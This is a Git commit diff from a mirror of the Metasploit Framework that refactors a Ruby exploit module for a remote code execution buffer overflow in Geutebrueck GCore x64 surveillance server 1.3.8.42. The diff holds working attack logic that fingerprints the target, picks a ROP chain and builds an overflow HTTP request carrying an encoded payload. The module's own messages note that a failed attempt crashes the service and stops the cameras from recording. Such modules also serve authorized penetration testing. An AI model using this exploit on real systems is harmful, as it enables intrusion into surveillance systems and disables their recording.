infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

codefixing

master
Maurice Popp 2017-10-07 14:06:58 +02:00
parent 7fe750422e
commit 8d50c34e4b
1 changed files with 156 additions and 178 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
View File

@ -40,11 +40,16 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DisclosureDate' => 'Jan 24 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(13003)
])
end
def fingerprint
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...')
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml'))
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
@doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))
statistics = @doc.css('modulestate')
statistics.each do |x|
if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
@ -57,8 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Appears, mytarget
end
end
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.')
print_status("Make sure that you know the exact version, otherwise you'll knock out the service.")
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')
print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
[Exploit::CheckCode::Unknown, nil]
@ -222,44 +227,18 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
if target['auto']
checkcode, target = fingerprint
if checkcode.to_s.include? 'unknown'
print_status('No vulnerable Version detected - exploit aborted.')
else
checkcode, self.target = fingerprint
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
target_rop, target_overwrite, target_stack_align = ropchain(target)
begin
connect
print_status('Crafting Exploit...')
http_req = 'GET /'
buffer_200 = "\x41" * 200
rop = target_rop
payload.encoded
buffer_1823 = "\x41" * 1823
overwrite = target_overwrite
stack_align = target_stack_align
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
print_status('Exploit ready for sending...')
sock.put(exploit, 'Timeout' => 20)
print_status('Exploit sent!')
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
print_status('Closing socket.')
disconnect
end
end
else
print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
print_status("Selected version: #{self.target.name}")
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
end
begin
connect
print_status('Crafting Exploit...')
http_req = 'GET /'
buffer_200 = "\x41" * 200
rop = target_rop
@ -279,7 +258,6 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Closing socket.')
disconnect
end
end
end
end